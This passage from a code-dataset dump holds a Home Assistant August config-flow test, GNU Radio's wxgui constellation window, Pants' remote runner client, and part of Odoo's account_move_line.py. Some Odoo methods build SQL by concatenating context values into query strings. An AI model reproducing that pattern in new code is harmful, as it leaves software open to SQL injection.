len(mock_validate_verification_code.mock_calls) == 1\n assert result3[\"type\"] == \"form\"\n assert result3[\"errors\"] is None\n assert result3[\"step_id\"] == \"validation\"\n\n # Try with the CORRECT verification code and we setup\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n return_value=True,\n ), patch(\n \"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code\",\n return_value=ValidationResult.VALIDATED,\n ) as mock_validate_verification_code, patch(\n \"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code\",\n return_value=True,\n ) as mock_send_verification_code, patch(\n \"homeassistant.components.august.async_setup\", return_value=True\n ) as mock_setup, patch(\n \"homeassistant.components.august.async_setup_entry\", return_value=True\n ) as mock_setup_entry:\n result4 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {VERIFICATION_CODE_KEY: \"correct\"},\n )\n await hass.async_block_till_done()\n\n assert len(mock_send_verification_code.mock_calls) == 0\n assert len(mock_validate_verification_code.mock_calls) == 1\n assert result4[\"type\"] == \"create_entry\"\n assert result4[\"title\"] == \"my@email.tld\"\n assert result4[\"data\"] == {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n CONF_INSTALL_ID: None,\n CONF_TIMEOUT: 10,\n CONF_ACCESS_TOKEN_CACHE_FILE: \".my@email.tld.august.conf\",\n }\n assert len(mock_setup.mock_calls) == 1\n assert len(mock_setup_entry.mock_calls) == 1\n\n\nasync def test_form_reauth(hass):\n \"\"\"Test reauthenticate.\"\"\"\n\n entry = MockConfigEntry(\n domain=DOMAIN,\n data={\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n CONF_INSTALL_ID: None,\n CONF_TIMEOUT: 10,\n CONF_ACCESS_TOKEN_CACHE_FILE: \".my@email.tld.august.conf\",\n },\n unique_id=\"my@email.tld\",\n )\n entry.add_to_hass(hass)\n\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": \"reauth\"}, data=entry.data\n )\n assert result[\"type\"] == \"form\"\n assert result[\"errors\"] == {}\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n return_value=True,\n ), patch(\n \"homeassistant.components.august.async_setup\", return_value=True\n ) as mock_setup, patch(\n \"homeassistant.components.august.async_setup_entry\",\n return_value=True,\n ) as mock_setup_entry:\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_PASSWORD: \"new-test-password\",\n },\n )\n await hass.async_block_till_done()\n\n assert result2[\"type\"] == \"abort\"\n assert result2[\"reason\"] == \"reauth_successful\"\n assert len(mock_setup.mock_calls) == 1\n assert len(mock_setup_entry.mock_calls) == 1\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2476,"cells":{"repo_name":{"kind":"string","value":"MingdaZhou/gnuradio"},"path":{"kind":"string","value":"gr-wxgui/python/wxgui/const_window.py"},"copies":{"kind":"string","value":"58"},"size":{"kind":"string","value":"6131"},"content":{"kind":"string","value":"#\n# Copyright 2008 Free Software Foundation, Inc.\n#\n# This file is part of GNU Radio\n#\n# GNU Radio is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3, or (at your option)\n# any later version.\n#\n# GNU Radio is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with GNU Radio; see the file COPYING. If not, write to\n# the Free Software Foundation, Inc., 51 Franklin Street,\n# Boston, MA 02110-1301, USA.\n#\n\n##################################################\n# Imports\n##################################################\nimport plotter\nimport common\nimport wx\nimport numpy\nimport math\nimport pubsub\nfrom constants import *\nfrom gnuradio import gr #for gr.prefs\nimport forms\n\n##################################################\n# Constants\n##################################################\nSLIDER_STEPS = 200\nLOOP_BW_MIN_EXP, LOOP_BW_MAX_EXP = -6, 0.0\nGAIN_MU_MIN_EXP, GAIN_MU_MAX_EXP = -6, -0.301\nDEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'const_rate', 5)\nDEFAULT_WIN_SIZE = (500, 400)\nDEFAULT_CONST_SIZE = gr.prefs().get_long('wxgui', 'const_size', 2048)\nCONST_PLOT_COLOR_SPEC = (0, 0, 1)\nMARKER_TYPES = (\n\t('Dot Small', 1.0),\n\t('Dot Medium', 2.0),\n\t('Dot Large', 3.0),\n\t('Line Link', None),\n)\nDEFAULT_MARKER_TYPE = 2.0\n\n##################################################\n# Constellation window control panel\n##################################################\nclass control_panel(wx.Panel):\n\t\"\"\"\n\tA control panel with wx widgits to control the plotter.\n\t\"\"\"\n\tdef __init__(self, parent):\n\t\t\"\"\"\n\t\tCreate a new control panel.\n\n Args:\n\t\t parent: the wx parent window\n\t\t\"\"\"\n\t\tself.parent = parent\n\t\twx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER)\n\t\tparent[SHOW_CONTROL_PANEL_KEY] = True\n\t\tparent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show)\n\t\tcontrol_box = forms.static_box_sizer(\n\t\t\tparent=self, label='Options',\n\t\t\tbold=True, orient=wx.VERTICAL,\n\t\t)\n\t\t#loop_bw\n\t\tcontrol_box.AddStretchSpacer()\n\t\tforms.text_box(\n\t\t\tsizer=control_box, parent=self, label='Loop Bandwidth',\n\t\t\tconverter=forms.float_converter(),\n\t\t\tps=parent, key=LOOP_BW_KEY,\n\t\t)\n\t\tforms.log_slider(\n\t\t\tsizer=control_box, parent=self,\n\t\t\tmin_exp=LOOP_BW_MIN_EXP,\n\t\t\tmax_exp=LOOP_BW_MAX_EXP,\n\t\t\tnum_steps=SLIDER_STEPS,\n\t\t\tps=parent, key=LOOP_BW_KEY,\n\t\t)\n\t\t#gain_mu\n\t\tcontrol_box.AddStretchSpacer()\n\t\tforms.text_box(\n\t\t\tsizer=control_box, parent=self, label='Gain Mu',\n\t\t\tconverter=forms.float_converter(),\n\t\t\tps=parent, key=GAIN_MU_KEY,\n\t\t)\n\t\tforms.log_slider(\n\t\t\tsizer=control_box, parent=self,\n\t\t\tmin_exp=GAIN_MU_MIN_EXP,\n\t\t\tmax_exp=GAIN_MU_MAX_EXP,\n\t\t\tnum_steps=SLIDER_STEPS,\n\t\t\tps=parent, key=GAIN_MU_KEY,\n\t\t)\n\t\t#marker\n\t\tcontrol_box.AddStretchSpacer()\n\t\tforms.drop_down(\n\t\t\tsizer=control_box, parent=self,\n\t\t\tps=parent, key=MARKER_KEY, label='Marker',\n\t\t\tchoices=map(lambda x: x[1], MARKER_TYPES),\n\t\t\tlabels=map(lambda x: x[0], MARKER_TYPES),\n\t\t)\n\t\t#run/stop\n\t\tcontrol_box.AddStretchSpacer()\n\t\tforms.toggle_button(\n\t\t\tsizer=control_box, parent=self,\n\t\t\ttrue_label='Stop', false_label='Run',\n\t\t\tps=parent, key=RUNNING_KEY,\n\t\t)\n\t\t#set sizer\n\t\tself.SetSizerAndFit(control_box)\n\n##################################################\n# Constellation window with plotter and control panel\n##################################################\nclass const_window(wx.Panel, pubsub.pubsub):\n\tdef __init__(\n\t\tself,\n\t\tparent,\n\t\tcontroller,\n\t\tsize,\n\t\ttitle,\n\t\tmsg_key,\n\t\tloop_bw_key,\n\t\tgain_mu_key,\n\t\tgain_omega_key,\n\t\tomega_key,\n\t\tsample_rate_key,\n\t):\n\t\tpubsub.pubsub.__init__(self)\n\t\t#proxy the keys\n\t\tself.proxy(MSG_KEY, controller, msg_key)\n\t\tself.proxy(LOOP_BW_KEY, controller, loop_bw_key)\n\t\tself.proxy(GAIN_MU_KEY, controller, gain_mu_key)\n\t\tself.proxy(GAIN_OMEGA_KEY, controller, gain_omega_key)\n\t\tself.proxy(OMEGA_KEY, controller, omega_key)\n\t\tself.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key)\n\t\t#initialize values\n\t\tself[RUNNING_KEY] = True\n\t\tself[X_DIVS_KEY] = 8\n\t\tself[Y_DIVS_KEY] = 8\n\t\tself[MARKER_KEY] = DEFAULT_MARKER_TYPE\n\t\t#init panel and plot\n\t\twx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER)\n\t\tself.plotter = plotter.channel_plotter(self)\n\t\tself.plotter.SetSize(wx.Size(*size))\n\t\tself.plotter.SetSizeHints(*size)\n\t\tself.plotter.set_title(title)\n\t\tself.plotter.set_x_label('Inphase')\n\t\tself.plotter.set_y_label('Quadrature')\n\t\tself.plotter.enable_point_label(True)\n\t\tself.plotter.enable_grid_lines(True)\n\t\t#setup the box with plot and controls\n\t\tself.control_panel = control_panel(self)\n\t\tmain_box = wx.BoxSizer(wx.HORIZONTAL)\n\t\tmain_box.Add(self.plotter, 1, wx.EXPAND)\n\t\tmain_box.Add(self.control_panel, 0, wx.EXPAND)\n\t\tself.SetSizerAndFit(main_box)\n\t\t#alpha and gain mu 2nd orders\n\t\tdef set_gain_omega(gain_mu): self[GAIN_OMEGA_KEY] = .25*gain_mu**2\n\t\tself.subscribe(GAIN_MU_KEY, set_gain_omega)\n\t\t#register events\n\t\tself.subscribe(MSG_KEY, self.handle_msg)\n\t\tself.subscribe(X_DIVS_KEY, self.update_grid)\n\t\tself.subscribe(Y_DIVS_KEY, self.update_grid)\n\t\t#initial update\n\t\tself.update_grid()\n\n\tdef handle_msg(self, msg):\n\t\t\"\"\"\n\t\tPlot the samples onto the complex grid.\n\n Args:\n\t\t msg: the array of complex samples\n\t\t\"\"\"\n\t\tif not self[RUNNING_KEY]: return\n\t\t#convert to complex floating point numbers\n\t\tsamples = numpy.fromstring(msg, numpy.complex64)\n\t\treal = numpy.real(samples)\n\t\timag = numpy.imag(samples)\n\t\t#plot\n\t\tself.plotter.set_waveform(\n\t\t\tchannel=0,\n\t\t\tsamples=(real, imag),\n\t\t\tcolor_spec=CONST_PLOT_COLOR_SPEC,\n\t\t\tmarker=self[MARKER_KEY],\n\t\t)\n\t\t#update the plotter\n\t\tself.plotter.update()\n\n\tdef update_grid(self):\n\t\t#update the x axis\n\t\tx_max = 2.0\n\t\tself.plotter.set_x_grid(-x_max, x_max, common.get_clean_num(2.0*x_max/self[X_DIVS_KEY]))\n\t\t#update the y axis\n\t\ty_max = 2.0\n\t\tself.plotter.set_y_grid(-y_max, y_max, common.get_clean_num(2.0*y_max/self[Y_DIVS_KEY]))\n\t\t#update plotter\n\t\tself.plotter.update()\n\n\n\n\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2477,"cells":{"repo_name":{"kind":"string","value":"manasapte/pants"},"path":{"kind":"string","value":"src/python/pants/bin/remote_pants_runner.py"},"copies":{"kind":"string","value":"7"},"size":{"kind":"string","value":"3179"},"content":{"kind":"string","value":"# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport signal\nimport sys\nfrom contextlib import contextmanager\n\nfrom pants.java.nailgun_client import NailgunClient\nfrom pants.java.nailgun_protocol import NailgunProtocol\nfrom pants.pantsd.process_manager import ProcessMetadataManager\n\n\nclass RemotePantsRunner(object):\n \"\"\"A thin client variant of PantsRunner.\"\"\"\n\n class PortNotFound(Exception): pass\n\n PANTS_COMMAND = 'pants'\n RECOVERABLE_EXCEPTIONS = (PortNotFound, NailgunClient.NailgunConnectionError)\n\n def __init__(self, exiter, args, env, process_metadata_dir=None,\n stdin=None, stdout=None, stderr=None):\n \"\"\"\n :param Exiter exiter: The Exiter instance to use for this run.\n :param list args: The arguments (e.g. sys.argv) for this run.\n :param dict env: The environment (e.g. os.environ) for this run.\n :param str process_metadata_dir: The directory in which process metadata is kept.\n :param file stdin: The stream representing stdin.\n :param file stdout: The stream representing stdout.\n :param file stderr: The stream representing stderr.\n \"\"\"\n self._exiter = exiter\n self._args = args\n self._env = env\n self._process_metadata_dir = process_metadata_dir\n self._stdin = stdin or sys.stdin\n self._stdout = stdout or sys.stdout\n self._stderr = stderr or sys.stderr\n self._port = self._retrieve_pailgun_port()\n if not self._port:\n raise self.PortNotFound('unable to locate pailgun port!')\n\n @staticmethod\n def _combine_dicts(*dicts):\n \"\"\"Combine one or more dicts into a new, unified dict (dicts to the right take precedence).\"\"\"\n return {k: v for d in dicts for k, v in d.items()}\n\n @contextmanager\n def _trapped_control_c(self, client):\n \"\"\"A contextmanager that overrides the SIGINT (control-c) handler and handles it remotely.\"\"\"\n def handle_control_c(signum, frame):\n client.send_control_c()\n\n existing_sigint_handler = signal.signal(signal.SIGINT, handle_control_c)\n signal.siginterrupt(signal.SIGINT, False) # Retry interrupted system calls.\n try:\n yield\n finally:\n signal.signal(signal.SIGINT, existing_sigint_handler)\n\n def _retrieve_pailgun_port(self):\n return ProcessMetadataManager(\n self._process_metadata_dir).read_metadata_by_name('pantsd', 'socket_pailgun', int)\n\n def run(self, args=None):\n # Merge the nailgun TTY capability environment variables with the passed environment dict.\n ng_env = NailgunProtocol.isatty_to_env(self._stdin, self._stdout, self._stderr)\n modified_env = self._combine_dicts(self._env, ng_env)\n\n # Instantiate a NailgunClient.\n client = NailgunClient(port=self._port, ins=self._stdin, out=self._stdout, err=self._stderr)\n\n with self._trapped_control_c(client):\n # Execute the command on the pailgun.\n result = client.execute(self.PANTS_COMMAND, *self._args, **modified_env)\n\n # Exit.\n self._exiter.exit(result)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2478,"cells":{"repo_name":{"kind":"string","value":"darkleons/odoo"},"path":{"kind":"string","value":"addons/account/account_move_line.py"},"copies":{"kind":"string","value":"9"},"size":{"kind":"string","value":"78170"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom datetime import datetime\n\nfrom openerp import workflow\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\nfrom openerp import tools\nfrom openerp.report import report_sxw\nimport openerp\n\nclass account_move_line(osv.osv):\n _name = \"account.move.line\"\n _description = \"Journal Items\"\n\n def _query_get(self, cr, uid, obj='l', context=None):\n fiscalyear_obj = self.pool.get('account.fiscalyear')\n fiscalperiod_obj = self.pool.get('account.period')\n account_obj = self.pool.get('account.account')\n fiscalyear_ids = []\n context = dict(context or {})\n initial_bal = context.get('initial_bal', False)\n company_clause = \" \"\n if context.get('company_id', False):\n company_clause = \" AND \" +obj+\".company_id = %s\" % context.get('company_id', False)\n if not context.get('fiscalyear', False):\n if context.get('all_fiscalyear', False):\n #this option is needed by the aged balance report because otherwise, if we search only the draft ones, an open invoice of a closed fiscalyear won't be displayed\n fiscalyear_ids = fiscalyear_obj.search(cr, uid, [])\n else:\n fiscalyear_ids = fiscalyear_obj.search(cr, uid, [('state', '=', 'draft')])\n else:\n #for initial balance as well as for normal query, we check only the selected FY because the best practice is to generate the FY opening entries\n fiscalyear_ids = [context['fiscalyear']]\n\n fiscalyear_clause = (','.join([str(x) for x in fiscalyear_ids])) or '0'\n state = context.get('state', False)\n where_move_state = ''\n where_move_lines_by_date = ''\n\n if context.get('date_from', False) and context.get('date_to', False):\n if initial_bal:\n where_move_lines_by_date = \" AND \" +obj+\".move_id IN (SELECT id FROM account_move WHERE date < '\" +context['date_from']+\"')\"\n else:\n where_move_lines_by_date = \" AND \" +obj+\".move_id IN (SELECT id FROM account_move WHERE date >= '\" +context['date_from']+\"' AND date <= '\"+context['date_to']+\"')\"\n\n if state:\n if state.lower() not in ['all']:\n where_move_state= \" AND \"+obj+\".move_id IN (SELECT id FROM account_move WHERE account_move.state = '\"+state+\"')\"\n if context.get('period_from', False) and context.get('period_to', False) and not context.get('periods', False):\n if initial_bal:\n period_company_id = fiscalperiod_obj.browse(cr, uid, context['period_from'], context=context).company_id.id\n first_period = fiscalperiod_obj.search(cr, uid, [('company_id', '=', period_company_id)], order='date_start', limit=1)[0]\n context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, first_period, context['period_from'])\n else:\n context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, context['period_from'], context['period_to'])\n if context.get('periods', False):\n if initial_bal:\n query = obj+\".state <> 'draft' AND \"+obj+\".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s\" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)\n period_ids = fiscalperiod_obj.search(cr, uid, [('id', 'in', context['periods'])], order='date_start', limit=1)\n if period_ids and period_ids[0]:\n first_period = fiscalperiod_obj.browse(cr, uid, period_ids[0], context=context)\n ids = ','.join([str(x) for x in context['periods']])\n query = obj+\".state <> 'draft' AND \"+obj+\".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND date_start <= '%s' AND id NOT IN (%s)) %s %s\" % (fiscalyear_clause, first_period.date_start, ids, where_move_state, where_move_lines_by_date)\n else:\n ids = ','.join([str(x) for x in context['periods']])\n query = obj+\".state <> 'draft' AND \"+obj+\".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND id IN (%s)) %s %s\" % (fiscalyear_clause, ids, where_move_state, where_move_lines_by_date)\n else:\n query = obj+\".state <> 'draft' AND \"+obj+\".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s\" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)\n\n if initial_bal and not context.get('periods', False) and not where_move_lines_by_date:\n #we didn't pass any filter in the context, and the initial balance can't be computed using only the fiscalyear otherwise entries will be summed twice\n #so we have to invalidate this query\n raise osv.except_osv(_('Warning!'),_(\"You have not supplied enough arguments to compute the initial balance, please select a period and a journal in the context.\"))\n\n\n if context.get('journal_ids', False):\n query += ' AND '+obj+'.journal_id IN (%s)' % ','.join(map(str, context['journal_ids']))\n\n if context.get('chart_account_id', False):\n child_ids = account_obj._get_children_and_consol(cr, uid, [context['chart_account_id']], context=context)\n query += ' AND '+obj+'.account_id IN (%s)' % ','.join(map(str, child_ids))\n\n query += company_clause\n return query\n\n def _amount_residual(self, cr, uid, ids, field_names, args, context=None):\n \"\"\"\n This function returns the residual amount on a receivable or payable account.move.line.\n By default, it returns an amount in the currency of this journal entry (maybe different\n of the company currency), but if you pass 'residual_in_company_currency' = True in the\n context then the returned amount will be in company currency.\n \"\"\"\n res = {}\n if context is None:\n context = {}\n cur_obj = self.pool.get('res.currency')\n for move_line in self.browse(cr, uid, ids, context=context):\n res[move_line.id] = {\n 'amount_residual': 0.0,\n 'amount_residual_currency': 0.0,\n }\n\n if move_line.reconcile_id:\n continue\n if not move_line.account_id.reconcile:\n #this function does not suport to be used on move lines not related to a reconcilable account\n continue\n\n if move_line.currency_id:\n move_line_total = move_line.amount_currency\n sign = move_line.amount_currency < 0 and -1 or 1\n else:\n move_line_total = move_line.debit - move_line.credit\n sign = (move_line.debit - move_line.credit) < 0 and -1 or 1\n line_total_in_company_currency = move_line.debit - move_line.credit\n context_unreconciled = context.copy()\n if move_line.reconcile_partial_id:\n for payment_line in move_line.reconcile_partial_id.line_partial_ids:\n if payment_line.id == move_line.id:\n continue\n if payment_line.currency_id and move_line.currency_id and payment_line.currency_id.id == move_line.currency_id.id:\n move_line_total += payment_line.amount_currency\n else:\n if move_line.currency_id:\n context_unreconciled.update({'date': payment_line.date})\n amount_in_foreign_currency = cur_obj.compute(cr, uid, move_line.company_id.currency_id.id, move_line.currency_id.id, (payment_line.debit - payment_line.credit), round=False, context=context_unreconciled)\n move_line_total += amount_in_foreign_currency\n else:\n move_line_total += (payment_line.debit - payment_line.credit)\n line_total_in_company_currency += (payment_line.debit - payment_line.credit)\n\n result = move_line_total\n res[move_line.id]['amount_residual_currency'] = sign * (move_line.currency_id and self.pool.get('res.currency').round(cr, uid, move_line.currency_id, result) or result)\n res[move_line.id]['amount_residual'] = sign * line_total_in_company_currency\n return res\n\n def default_get(self, cr, uid, fields, context=None):\n data = self._default_get(cr, uid, fields, context=context)\n for f in data.keys():\n if f not in fields:\n del data[f]\n return data\n\n def _prepare_analytic_line(self, cr, uid, obj_line, context=None):\n \"\"\"\n Prepare the values given at the create() of account.analytic.line upon the validation of a journal item having\n an analytic account. This method is intended to be extended in other modules.\n\n :param obj_line: browse record of the account.move.line that triggered the analytic line creation\n \"\"\"\n return {'name': obj_line.name,\n 'date': obj_line.date,\n 'account_id': obj_line.analytic_account_id.id,\n 'unit_amount': obj_line.quantity,\n 'product_id': obj_line.product_id and obj_line.product_id.id or False,\n 'product_uom_id': obj_line.product_uom_id and obj_line.product_uom_id.id or False,\n 'amount': (obj_line.credit or 0.0) - (obj_line.debit or 0.0),\n 'general_account_id': obj_line.account_id.id,\n 'journal_id': obj_line.journal_id.analytic_journal_id.id,\n 'ref': obj_line.ref,\n 'move_id': obj_line.id,\n 'user_id': uid,\n }\n\n def create_analytic_lines(self, cr, uid, ids, context=None):\n acc_ana_line_obj = self.pool.get('account.analytic.line')\n for obj_line in self.browse(cr, uid, ids, context=context):\n if obj_line.analytic_account_id:\n if not obj_line.journal_id.analytic_journal_id:\n raise osv.except_osv(_('No Analytic Journal!'),_(\"You have to define an analytic journal on the '%s' journal!\") % (obj_line.journal_id.name, ))\n if obj_line.analytic_lines:\n acc_ana_line_obj.unlink(cr,uid,[obj.id for obj in obj_line.analytic_lines])\n vals_line = self._prepare_analytic_line(cr, uid, obj_line, context=context)\n acc_ana_line_obj.create(cr, uid, vals_line)\n return True\n\n def _default_get_move_form_hook(self, cursor, user, data):\n '''Called in the end of default_get method for manual entry in account_move form'''\n if data.has_key('analytic_account_id'):\n del(data['analytic_account_id'])\n if data.has_key('account_tax_id'):\n del(data['account_tax_id'])\n return data\n\n def convert_to_period(self, cr, uid, context=None):\n if context is None:\n context = {}\n period_obj = self.pool.get('account.period')\n #check if the period_id changed in the context from client side\n if context.get('period_id', False):\n period_id = context.get('period_id')\n if type(period_id) == str:\n ids = period_obj.search(cr, uid, [('name', 'ilike', period_id)])\n context = dict(context, period_id=ids and ids[0] or False)\n return context\n\n def _default_get(self, cr, uid, fields, context=None):\n #default_get should only do the following:\n # -propose the next amount in debit/credit in order to balance the move\n # -propose the next account from the journal (default debit/credit account) accordingly\n context = dict(context or {})\n account_obj = self.pool.get('account.account')\n period_obj = self.pool.get('account.period')\n journal_obj = self.pool.get('account.journal')\n move_obj = self.pool.get('account.move')\n tax_obj = self.pool.get('account.tax')\n fiscal_pos_obj = self.pool.get('account.fiscal.position')\n partner_obj = self.pool.get('res.partner')\n currency_obj = self.pool.get('res.currency')\n\n if not context.get('journal_id', False):\n context['journal_id'] = context.get('search_default_journal_id', False)\n if not context.get('period_id', False):\n context['period_id'] = context.get('search_default_period_id', False)\n context = self.convert_to_period(cr, uid, context)\n\n # Compute simple values\n data = super(account_move_line, self).default_get(cr, uid, fields, context=context)\n if context.get('journal_id'):\n total = 0.0\n #in account.move form view, it is not possible to compute total debit and credit using\n #a browse record. So we must use the context to pass the whole one2many field and compute the total\n if context.get('line_id'):\n for move_line_dict in move_obj.resolve_2many_commands(cr, uid, 'line_id', context.get('line_id'), context=context):\n data['name'] = data.get('name') or move_line_dict.get('name')\n data['partner_id'] = data.get('partner_id') or move_line_dict.get('partner_id')\n total += move_line_dict.get('debit', 0.0) - move_line_dict.get('credit', 0.0)\n elif context.get('period_id'):\n #find the date and the ID of the last unbalanced account.move encoded by the current user in that journal and period\n move_id = False\n cr.execute('''SELECT move_id, date FROM account_move_line\n WHERE journal_id = %s AND period_id = %s AND create_uid = %s AND state = %s\n ORDER BY id DESC limit 1''', (context['journal_id'], context['period_id'], uid, 'draft'))\n res = cr.fetchone()\n move_id = res and res[0] or False\n data['date'] = res and res[1] or period_obj.browse(cr, uid, context['period_id'], context=context).date_start\n data['move_id'] = move_id\n if move_id:\n #if there exist some unbalanced accounting entries that match the journal and the period,\n #we propose to continue the same move by copying the ref, the name, the partner...\n move = move_obj.browse(cr, uid, move_id, context=context)\n data.setdefault('name', move.line_id[-1].name)\n for l in move.line_id:\n data['partner_id'] = data.get('partner_id') or l.partner_id.id\n data['ref'] = data.get('ref') or l.ref\n total += (l.debit or 0.0) - (l.credit or 0.0)\n\n #compute the total of current move\n data['debit'] = total < 0 and -total or 0.0\n data['credit'] = total > 0 and total or 0.0\n #pick the good account on the journal accordingly if the next proposed line will be a debit or a credit\n journal_data = journal_obj.browse(cr, uid, context['journal_id'], context=context)\n account = total > 0 and journal_data.default_credit_account_id or journal_data.default_debit_account_id\n #map the account using the fiscal position of the partner, if needed\n part = data.get('partner_id') and partner_obj.browse(cr, uid, data['partner_id'], context=context) or False\n if account and data.get('partner_id'):\n account = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, account.id)\n account = account_obj.browse(cr, uid, account, context=context)\n data['account_id'] = account and account.id or False\n #compute the amount in secondary currency of the account, if needed\n if account and account.currency_id:\n data['currency_id'] = account.currency_id.id\n #set the context for the multi currency change\n compute_ctx = context.copy()\n compute_ctx.update({\n #the following 2 parameters are used to choose the currency rate, in case where the account\n #doesn't work with an outgoing currency rate method 'at date' but 'average'\n 'res.currency.compute.account': account,\n 'res.currency.compute.account_invert': True,\n })\n if data.get('date'):\n compute_ctx.update({'date': data['date']})\n data['amount_currency'] = currency_obj.compute(cr, uid, account.company_id.currency_id.id, data['currency_id'], -total, context=compute_ctx)\n data = self._default_get_move_form_hook(cr, uid, data)\n return data\n\n def on_create_write(self, cr, uid, id, context=None):\n if not id:\n return []\n ml = self.browse(cr, uid, id, context=context)\n return map(lambda x: x.id, ml.move_id.line_id)\n\n def _balance(self, cr, uid, ids, name, arg, context=None):\n if context is None:\n context = {}\n c = context.copy()\n c['initital_bal'] = True\n sql = \"\"\"SELECT l1.id, COALESCE(SUM(l2.debit-l2.credit), 0)\n FROM account_move_line l1 LEFT JOIN account_move_line l2\n ON (l1.account_id = l2.account_id\n AND l2.id <= l1.id\n AND \"\"\" + \\\n self._query_get(cr, uid, obj='l2', context=c) + \\\n \") WHERE l1.id IN %s GROUP BY l1.id\"\n\n cr.execute(sql, [tuple(ids)])\n return dict(cr.fetchall())\n\n def _invoice(self, cursor, user, ids, name, arg, context=None):\n invoice_obj = self.pool.get('account.invoice')\n res = {}\n for line_id in ids:\n res[line_id] = False\n cursor.execute('SELECT l.id, i.id ' \\\n 'FROM account_move_line l, account_invoice i ' \\\n 'WHERE l.move_id = i.move_id ' \\\n 'AND l.id IN %s',\n (tuple(ids),))\n invoice_ids = []\n for line_id, invoice_id in cursor.fetchall():\n res[line_id] = invoice_id\n invoice_ids.append(invoice_id)\n invoice_names = {False: ''}\n for invoice_id, name in invoice_obj.name_get(cursor, user, invoice_ids, context=context):\n invoice_names[invoice_id] = name\n for line_id in res.keys():\n invoice_id = res[line_id]\n res[line_id] = (invoice_id, invoice_names[invoice_id])\n return res\n\n def name_get(self, cr, uid, ids, context=None):\n if not ids:\n return []\n result = []\n for line in self.browse(cr, uid, ids, context=context):\n if line.ref:\n result.append((line.id, (line.move_id.name or '')+' ('+line.ref+')'))\n else:\n result.append((line.id, line.move_id.name))\n return result\n\n def _balance_search(self, cursor, user, obj, name, args, domain=None, context=None):\n if context is None:\n context = {}\n if not args:\n return []\n where = ' AND '.join(map(lambda x: '(abs(sum(debit-credit))'+x[1]+str(x[2])+')',args))\n cursor.execute('SELECT id, SUM(debit-credit) FROM account_move_line \\\n GROUP BY id, debit, credit having '+where)\n res = cursor.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n def _invoice_search(self, cursor, user, obj, name, args, context=None):\n if not args:\n return []\n invoice_obj = self.pool.get('account.invoice')\n i = 0\n while i < len(args):\n fargs = args[i][0].split('.', 1)\n if len(fargs) > 1:\n args[i] = (fargs[0], 'in', invoice_obj.search(cursor, user,\n [(fargs[1], args[i][1], args[i][2])]))\n i += 1\n continue\n if isinstance(args[i][2], basestring):\n res_ids = invoice_obj.name_search(cursor, user, args[i][2], [],\n args[i][1])\n args[i] = (args[i][0], 'in', [x[0] for x in res_ids])\n i += 1\n qu1, qu2 = [], []\n for x in args:\n if x[1] != 'in':\n if (x[2] is False) and (x[1] == '='):\n qu1.append('(i.id IS NULL)')\n elif (x[2] is False) and (x[1] == '<>' or x[1] == '!='):\n qu1.append('(i.id IS NOT NULL)')\n else:\n qu1.append('(i.id %s %s)' % (x[1], '%s'))\n qu2.append(x[2])\n elif x[1] == 'in':\n if len(x[2]) > 0:\n qu1.append('(i.id IN (%s))' % (','.join(['%s'] * len(x[2]))))\n qu2 += x[2]\n else:\n qu1.append(' (False)')\n if qu1:\n qu1 = ' AND' + ' AND'.join(qu1)\n else:\n qu1 = ''\n cursor.execute('SELECT l.id ' \\\n 'FROM account_move_line l, account_invoice i ' \\\n 'WHERE l.move_id = i.move_id ' + qu1, qu2)\n res = cursor.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n def _get_move_lines(self, cr, uid, ids, context=None):\n result = []\n for move in 